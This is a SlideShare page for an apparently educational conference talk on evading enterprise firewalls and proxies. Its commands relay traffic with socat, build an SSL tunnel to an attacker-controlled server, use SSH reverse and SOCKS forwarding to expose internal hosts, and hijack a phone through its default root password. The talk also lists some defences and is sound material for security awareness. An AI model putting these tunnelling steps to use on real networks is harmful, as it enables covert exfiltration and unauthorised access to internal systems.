SlideShare a Scribd company logo

Defeating The Network Security Infrastructure V1.0

Philippe Bogaerts
Philippe Bogaerts

This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.

Technology
1 of 35
Download to read offline
DEFEATING THE NETWORK SECURITY INFRASTRUCTURE How to get out, back in or … simply let everyone in … without being detected !
Common Sense  This is for education only and should not be used for any illegal, hacking or other activity that might cause harm or damage of any kind.  Only try this in an isolated lab environment to prevent accidental exposing of network services.
Assumption (1)  The attacker is allowed to bring in  an USB flash disk or CDROM  Access to a fully patched PC  AV and Personal Firewall may be installed or the attacker brings his own PC.  No exploits  Access to an external web server under the attacker’s control
Assumption (2)  A very restrictive firewall policy  Nothing is allowed out   Exception  HTTP(s) is allowed directly  HTTP(s) is allowed via an HTTP(s) proxy  No authentication  BASIC auth  NTLM auth (not tested yet)  Nothing is allowed in
Tools  SOCAT  http://www.dest-unreach.org/socat/  SSH client  Standard SSH client  PUTTY suite  OPENSSH SSH client  NTLM authorization proxy  http://ntlmaps.sourceforge.net  Backtrack  http://www.remote-exploit.org/backtrack.html
Preparing an escape route
Introduction  SOCAT is a utility that relays data between 2 data channels  Socket, files, PIPE …  Example  Any data SOCAT receives on port 6666 is relayed to www.company.com on port 80 # socat TCP4-LISTEN:6666 TCP4:www.company.com:80 SOCAT www.company.com tcp:6666 tcp:80  Works for HTTP, TELNET, SSH ...
How to test?  netcat # nc 127.0.0.1 6666  telnet # telnet 192.168.123.81 6666  Socat (as client software) # socat STDIO TCP:127.0.0.1:6666 or # socat STDIO TCP:192.168.123.81:6666
Accessing SSL enabled services  SOCAT can be used to access SSL enabled services # socat TCP4-LISTEN:6666 OPENSSL:192.168.123.50:443 SOCAT SSL_SERVICE tcp:6666 ssl:443  Works for HTTPS, IMAPS, POPS, LDAPS …
Demo
Escaping through a proxy  SOCAT can forward connections through an HTTP proxy # socat TCP4-LISTEN:6666 TCP4:proxy.company.com:8080 SOCAT HTTP_PROXY SERVICE tcp:6666 tcp:8080 tcp:80
Escaping via the proxy using SSL  SSL connections can be proxied through a HTTP proxy using the CONNECT method # socat TCP4-LISTEN:6666 / PROXY:proxy.company.com:ssl.company.com:443  Remark: Local listener expects an SSL connection ssl SOCAT HTTP_PROXY SSL_SERVICE ssl:6666 tcp:8080 ssl:443
Demo
Forwarding SSH over a proxy  Relaying a SSH over an open proxy.  very often not allowed  open proxies do exist “in the wild”  mostly only on TCP 443 can be relayed using the CONNECT method (but don’t panic yet ) #socat TCP4-listen:6666 / PROXY:proxy.company.com:ssh.myserver.com:22 ssh SOCAT HTTP_PROXY SSH_SERVICE tcp:6666 tcp:8080 ssh:22
Creating tunnels
Creating an end-to-end SSL tunnel  On the attacking machine, SOCAT relays input over the SSL connection #socat TCP4-listen:6666 OPENSSL:my.server.com:443  The SSL tunnel is terminated on the attacker’s server and forwarded to a listening TCP socket #socat OPENSSL-LISTEN:443,cert=path_to_cert TCP4:127.0.0.1:22
Tunneling tcp:6666 tcp:22 SOCAT SOCAT tcp:1234 tcp:6666 tcp:22 ssl SOCAT SOCAT ssl:443
Tunneling TCP over SSL and Proxy  When SOCAT_1 connects to SOCAT_2, SOCAT_2 will initiate a CONNECT method to the proxy allowing a SSL connection to be negotiated between SOCAT_1 and SOCAT_3 tcp:6666 tcp:22 ssl SOCAT_1 SOCAT_2 HTTP_PROXY SOCAT_3 ssl:4444 tcp:8080 ssl:443 #socat TCP4-listen:6666 OPENSSL:localhost:4444 #socat TCP4-listen:4444 PROXY:proxy.company.com:my.server.com:443 #socat OPENSSL-LISTEN:443,cert=path_to_cert TCP4:127.0.0.1:22
Handling NTLM authentication  NTLM authentication  An additional NTLM Authorization Proxy Server might be inserted to authenticate to the http_proxy, if required. tcp:6666 tcp:22 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool ssl
Any TCP connection can be mapped in this way across firewalls, proxies, IDS ….. and of course, securely and almost invisible !!
Introducing SSH over SSL  SSH can be tunneled through the established SSL tunnel # ssh username@127.0.0.1 –p 6666 SSH SSH CLIENT SERVER tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
SSH options -L  Option -L # ssh username@127.0.0.1 –p 6666 –L 3333:127.0.0.1:2222  Data received on the listening client socket is forwarded over the SSH connection (wrapped into the SSL tunnel) to SSH server.  The SSH server forwards the data over a new TCP connection to destination specified  Localhost  Any IP address !!
SSL SSH tcp:3333 tcp:2222 SSH SERVER SSH CLIENT tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
SSH options -R  Option -R # ssh username@127.0.0.1 –p 6666 –R 3333:127.0.0.1:2222  Reverse port forwarding  port 3333 accepts incoming connections on the SSH server!  Accepted connections are forwarded through the SSH connection (reverse direction) to the SSH client.  SSH client originates and establishes a connection to 127.0.0.1:2222  Localhost  Any INTERNAL IP ADDRESS can be specified!!!
SSL SSH tcp:2222 tcp:3333 SSH SERVER SSH CLIENT tcp:22 tcp:6666 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool SSL
SSH options -D  Option -D ssh username@127.0.0.1 –p 6666 –D 1080  SOCKS proxy  port 1080 accepts incoming connections on the SSH client and forwards the request to the SSH server acting as a socks proxy.
SOCKS ENABLED CLIENT tcp:1080 SSH SERVER SSH CLIENT tcp:6666 tcp:22 Ntlm- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 Tcp:8080 proxy tool SSL
Game over ?!? SOCKS SOCKS ENABLED ENABLED CLIENT CLIENT tcp:1080 tcp:1080 tcp:1080 SSH SERVER SSH CLIENT SSH SERVER SSH CLIENT tcp:1080 tcp:6666 tcp:22 NTLM- SOCAT_1 SOCAT_2 authentication HTTP_PROXY SOCAT_3 tcp:8080 proxy tool ssl
Additional tricks  Use non of non-standard ports  “optimizing” SSL  X.509 client certificates  “strong” ciphers to protect SSL tunnels being arp spoofed …  Fine tuning SOCAT options  fork, su, proxyport …  Fragmentation (still does the trick )
Feasibility?  BackTrack 3 has everything on board  Runs from USB, CDROM, Virtual desktops …  Similar tools are available for windows platform with limited privileges  Will it work from your network?  99% chance?  Do I really need the most complicated scenario?  No direct TCP connections to the outside?
What can I do about it?  Very restrictive desktop policy  No USB support  No boot from CDROM/USB  No possible way to install software  Bios passwords  Baseline traffic  Effectiveness?  Advanced forward proxy technology  Feasibility and impact?  Other solutions?
Things to think about  Network firewalls CANNOT help you …  IDS/IPS will not help …  Content Security proxies will not help …  What about outbound(SSL)VPN connections?  Very dangerous in this respect !  Network layer functionality  OPENVPN can be tunneled!  Very rich feature set  Bridging networks
Questions ?
Snow White was almost killed by an apple …  Imagine a “ziphoned” MP3 player enabled phone on a public wireless network and xxradar being bored … c:pscp root@phoneip:/etc/sshd_config ./. c:write sshd_config change accordingly ;-) c:pscp ./sshd_config root@phoneip:/etc/sshd_config ... SSH into the phone and relaunch SSH or reboot ... c:plink root@phoneip -D 1080  Any idea what this means ???  No? you better turn of your phone then   Oh yes I forgot, there is a standard password on that “ziphoned” MP3 player enabled phone!
Thank you for listening ! Philippe Bogaerts philippe.bogaerts at radarhack.com http://www.radarhack.com http://www.radarsec.com Reviewed by Kris Boulez (Ascure)

Recommended

Acus08 Advanced Load Balancing Apache2.2
Acus08 Advanced Load Balancing Apache2.2Acus08 Advanced Load Balancing Apache2.2
Acus08 Advanced Load Balancing Apache2.2
Jim Jagielski
 
Apache httpd 2.4 Reverse Proxy
Apache httpd 2.4 Reverse ProxyApache httpd 2.4 Reverse Proxy
Apache httpd 2.4 Reverse Proxy
Jim Jagielski
 
Apache httpd reverse proxy and Tomcat
Apache httpd reverse proxy and TomcatApache httpd reverse proxy and Tomcat
Apache httpd reverse proxy and Tomcat
Jean-Frederic Clere
 
Kubernetes networking - basics
Kubernetes networking - basicsKubernetes networking - basics
Kubernetes networking - basics
Juraj Hantak
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
Docker and Fargate
Docker and FargateDocker and Fargate
Docker and Fargate
Shinji Miyazato
 
Installation Openstack Swift
Installation Openstack SwiftInstallation Openstack Swift
Installation Openstack Swift
ymtech
 
青云CoreOS虚拟机部署kubernetes
青云CoreOS虚拟机部署kubernetes 青云CoreOS虚拟机部署kubernetes
青云CoreOS虚拟机部署kubernetes
Zhichao Liang
 

Recommended

Acus08 Advanced Load Balancing Apache2.2
Acus08 Advanced Load Balancing Apache2.2Acus08 Advanced Load Balancing Apache2.2
Acus08 Advanced Load Balancing Apache2.2
Jim Jagielski
 
Apache httpd 2.4 Reverse Proxy
Apache httpd 2.4 Reverse ProxyApache httpd 2.4 Reverse Proxy
Apache httpd 2.4 Reverse Proxy
Jim Jagielski
 
Apache httpd reverse proxy and Tomcat
Apache httpd reverse proxy and TomcatApache httpd reverse proxy and Tomcat
Apache httpd reverse proxy and Tomcat
Jean-Frederic Clere
 
Kubernetes networking - basics
Kubernetes networking - basicsKubernetes networking - basics
Kubernetes networking - basics
Juraj Hantak
 
OWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA TestersOWASP ZAP Workshop for QA Testers
OWASP ZAP Workshop for QA Testers
Javan Rasokat
 
Docker and Fargate
Docker and FargateDocker and Fargate
Docker and Fargate
Shinji Miyazato
 
Installation Openstack Swift
Installation Openstack SwiftInstallation Openstack Swift
Installation Openstack Swift
ymtech
 
青云CoreOS虚拟机部署kubernetes
青云CoreOS虚拟机部署kubernetes 青云CoreOS虚拟机部署kubernetes
青云CoreOS虚拟机部署kubernetes
Zhichao Liang
 
Introduction to Haproxy
Introduction to HaproxyIntroduction to Haproxy
Introduction to Haproxy
Shaopeng He
 
OpenStack networking
OpenStack networkingOpenStack networking
OpenStack networking
Sim Janghoon
 
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
Jxck Jxck
 
Commication Framework in OpenStack
Commication Framework in OpenStackCommication Framework in OpenStack
Commication Framework in OpenStack
Sean Chang
 
Nginx Internals
Nginx InternalsNginx Internals
Nginx Internals
Joshua Zhu
 
Openstack Networking Internals - first part
Openstack Networking Internals - first partOpenstack Networking Internals - first part
Openstack Networking Internals - first part
lilliput12
 
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 eraHTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
peychevi
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
Source Conference
 
Introduction to QUIC
Introduction to QUICIntroduction to QUIC
Introduction to QUIC
Shuya Osaki
 
Virtualized network with openvswitch
Virtualized network with openvswitchVirtualized network with openvswitch
Virtualized network with openvswitch
Sim Janghoon
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUIC
shigeki_ohtsu
 
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTPAltitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
Fastly
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan Drivers
Brent Salisbury
 
Google QUIC
Google QUICGoogle QUIC
Google QUIC
Felipe Rayel
 
Squid Server
Squid ServerSquid Server
Squid Server
Sumant Garg
 
The Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitchThe Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitch
Te-Yen Liu
 
Open stack advanced_part
Open stack advanced_partOpen stack advanced_part
Open stack advanced_part
lilliput12
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pc
ApplistarVN
 
HAProxy scale out using open source
HAProxy scale out using open sourceHAProxy scale out using open source
HAProxy scale out using open source
Ingo Walz
 
Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awk
Yogesh Sawant
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity Tips
Keith Bennett
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
T. J. Saotome
 

More Related Content

What's hot

OpenStack networking
OpenStack networkingOpenStack networking
OpenStack networking
Sim Janghoon
 
Virtualized network with openvswitch
Virtualized network with openvswitchVirtualized network with openvswitch
Virtualized network with openvswitch
Sim Janghoon
 
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTPAltitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
Fastly
 

What's hot (19)

Introduction to Haproxy
Introduction to HaproxyIntroduction to Haproxy
Introduction to Haproxy
 
OpenStack networking
OpenStack networkingOpenStack networking
OpenStack networking
 
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
SPDY & HTTP2.0 & QUIC - #bpstudy 2013-08-28
 
Commication Framework in OpenStack
Commication Framework in OpenStackCommication Framework in OpenStack
Commication Framework in OpenStack
 
Nginx Internals
Nginx InternalsNginx Internals
Nginx Internals
 
Openstack Networking Internals - first part
Openstack Networking Internals - first partOpenstack Networking Internals - first part
Openstack Networking Internals - first part
 
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 eraHTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
HTTP/2 and QUICK protocols. Optimizing the Web stack for HTTP/2 era
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
 
Introduction to QUIC
Introduction to QUICIntroduction to QUIC
Introduction to QUIC
 
Virtualized network with openvswitch
Virtualized network with openvswitchVirtualized network with openvswitch
Virtualized network with openvswitch
 
Technical Overview of QUIC
Technical Overview of QUICTechnical Overview of QUIC
Technical Overview of QUIC
 
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTPAltitude SF 2017: QUIC - A low-latency secure transport for HTTP
Altitude SF 2017: QUIC - A low-latency secure transport for HTTP
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan Drivers
 
Google QUIC
Google QUICGoogle QUIC
Google QUIC
 
Squid Server
Squid ServerSquid Server
Squid Server
 
The Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitchThe Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitch
 
Open stack advanced_part
Open stack advanced_partOpen stack advanced_part
Open stack advanced_part
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pc
 
HAProxy scale out using open source
HAProxy scale out using open sourceHAProxy scale out using open source
HAProxy scale out using open source
 

Viewers also liked

Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processing
Anton Arhipov
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line tools
Eric Wilson
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014
iimjobs and hirist
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
Hemant Shah
 

Viewers also liked (20)

Learning sed and awk
Learning sed and awkLearning sed and awk
Learning sed and awk
 
Unix Command Line Productivity Tips
Unix Command Line Productivity TipsUnix Command Line Productivity Tips
Unix Command Line Productivity Tips
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Sed & awk the dynamic duo
Sed & awk the dynamic duoSed & awk the dynamic duo
Sed & awk the dynamic duo
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 
Secure SHell
Secure SHellSecure SHell
Secure SHell
 
Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...Web Application Security: Introduction to common classes of security flaws an...
Web Application Security: Introduction to common classes of security flaws an...
 
Practical Example of grep command in unix
Practical Example of grep command in unixPractical Example of grep command in unix
Practical Example of grep command in unix
 
Practical unix utilities for text processing
Practical unix utilities for text processingPractical unix utilities for text processing
Practical unix utilities for text processing
 
Unix command-line tools
Unix command-line toolsUnix command-line tools
Unix command-line tools
 
Secure shell protocol
Secure shell protocolSecure shell protocol
Secure shell protocol
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
 
Secure Shell(ssh)
Secure Shell(ssh)Secure Shell(ssh)
Secure Shell(ssh)
 
SSH - Secure Shell
SSH - Secure ShellSSH - Secure Shell
SSH - Secure Shell
 
SSH
SSHSSH
SSH
 
Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014Top 100 Linux Interview Questions and Answers 2014
Top 100 Linux Interview Questions and Answers 2014
 
RHCE FINAL Questions and Answers
RHCE FINAL Questions and AnswersRHCE FINAL Questions and Answers
RHCE FINAL Questions and Answers
 
Introduction to SSH
Introduction to SSHIntroduction to SSH
Introduction to SSH
 

Similar to Defeating The Network Security Infrastructure V1.0

Bh usa-01-kaminsky
Bh usa-01-kaminskyBh usa-01-kaminsky
Bh usa-01-kaminsky
Dan Kaminsky
 
17937858 squid-server - [the-xp.blogspot.com]
17937858 squid-server - [the-xp.blogspot.com]17937858 squid-server - [the-xp.blogspot.com]
17937858 squid-server - [the-xp.blogspot.com]
Krisman Tarigan
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
Slawomir Jasek
 

Similar to Defeating The Network Security Infrastructure V1.0 (20)

Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
 
Intro to SSH
Intro to SSHIntro to SSH
Intro to SSH
 
Bh usa-01-kaminsky
Bh usa-01-kaminskyBh usa-01-kaminsky
Bh usa-01-kaminsky
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 a
 
14 network tools
14 network tools14 network tools
14 network tools
 
Nagios Conference 2013 - Leland Lammert - Nagios in a Multi-Platform Enviornment
Nagios Conference 2013 - Leland Lammert - Nagios in a Multi-Platform EnviornmentNagios Conference 2013 - Leland Lammert - Nagios in a Multi-Platform Enviornment
Nagios Conference 2013 - Leland Lammert - Nagios in a Multi-Platform Enviornment
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso Remoto
 
Ssh tunnel
Ssh tunnelSsh tunnel
Ssh tunnel
 
Tatu: ssh as a service
Tatu: ssh as a serviceTatu: ssh as a service
Tatu: ssh as a service
 
Securing Network Access with Open Source solutions
Securing Network Access with Open Source solutionsSecuring Network Access with Open Source solutions
Securing Network Access with Open Source solutions
 
Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD Relayd: a load balancer for OpenBSD
Relayd: a load balancer for OpenBSD
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
17937858 squid-server - [the-xp.blogspot.com]
17937858 squid-server - [the-xp.blogspot.com]17937858 squid-server - [the-xp.blogspot.com]
17937858 squid-server - [the-xp.blogspot.com]
 
Python networking
Python networkingPython networking
Python networking
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
 
SSH Tunneling
SSH TunnelingSSH Tunneling
SSH Tunneling
 
Dhcp Snooping
Dhcp SnoopingDhcp Snooping
Dhcp Snooping
 
Advanced open ssh
Advanced open sshAdvanced open ssh
Advanced open ssh
 
Network tunneling techniques
Network tunneling techniquesNetwork tunneling techniques
Network tunneling techniques
 

Recently uploaded

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 

Recently uploaded (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 

Defeating The Network Security Infrastructure V1.0

  • 1. DEFEATING THE NETWORK SECURITY INFRASTRUCTURE How to get out, back in or … simply let everyone in … without being detected !
  • 2. Common Sense  This is for education only and should not be used for any illegal, hacking or other activity that might cause harm or damage of any kind.  Only try this in an isolated lab environment to prevent accidental exposing of network services.
  • 3. Assumption (1)  The attacker is allowed to bring in  an USB flash disk or CDROM  Access to a fully patched PC  AV and Personal Firewall may be installed or the attacker brings his own PC.  No exploits  Access to an external web server under the attacker’s control
  • 4. Assumption (2)  A very restrictive firewall policy  Nothing is allowed out   Exception  HTTP(s) is allowed directly  HTTP(s) is allowed via an HTTP(s) proxy  No authentication  BASIC auth  NTLM auth (not tested yet)  Nothing is allowed in
  • 5. Tools  SOCAT  http://www.dest-unreach.org/socat/  SSH client  Standard SSH client  PUTTY suite  OPENSSH SSH client  NTLM authorization proxy  http://ntlmaps.sourceforge.net  Backtrack  http://www.remote-exploit.org/backtrack.html
  • 7. Introduction  SOCAT is a utility that relays data between 2 data channels  Socket, files, PIPE …  Example  Any data SOCAT receives on port 6666 is relayed to www.company.com on port 80 # socat TCP4-LISTEN:6666 TCP4:www.company.com:80 SOCAT www.company.com tcp:6666 tcp:80  Works for HTTP, TELNET, SSH ...
  • 8. How to test?  netcat # nc 127.0.0.1 6666  telnet # telnet 192.168.123.81 6666  Socat (as client software) # socat STDIO TCP:127.0.0.1:6666 or # socat STDIO TCP:192.168.123.81:6666
  • 9. Accessing SSL enabled services  SOCAT can be used to access SSL enabled services # socat TCP4-LISTEN:6666 OPENSSL:192.168.123.50:443 SOCAT SSL_SERVICE tcp:6666 ssl:443  Works for HTTPS, IMAPS, POPS, LDAPS …
  • 10. Demo
  • 11. Escaping through a proxy  SOCAT can forward connections through an HTTP proxy # socat TCP4-LISTEN:6666 TCP4:proxy.company.com:8080 SOCAT HTTP_PROXY SERVICE tcp:6666 tcp:8080 tcp:80
  • 12. Escaping via the proxy using SSL  SSL connections can be proxied through a HTTP proxy using the CONNECT method # socat TCP4-LISTEN:6666 / PROXY:proxy.company.com:ssl.company.com:443  Remark: Local listener expects an SSL connection ssl SOCAT HTTP_PROXY SSL_SERVICE ssl:6666 tcp:8080 ssl:443
  • 13. Demo
  • 14. Forwarding SSH over a proxy  Relaying a SSH over an open proxy.  very often not allowed  open proxies do exist “in the wild”  mostly only on TCP 443 can be relayed using the CONNECT method (but don’t panic yet ) #socat TCP4-listen:6666 / PROXY:proxy.company.com:ssh.myserver.com:22 ssh SOCAT HTTP_PROXY SSH_SERVICE tcp:6666 tcp:8080 ssh:22
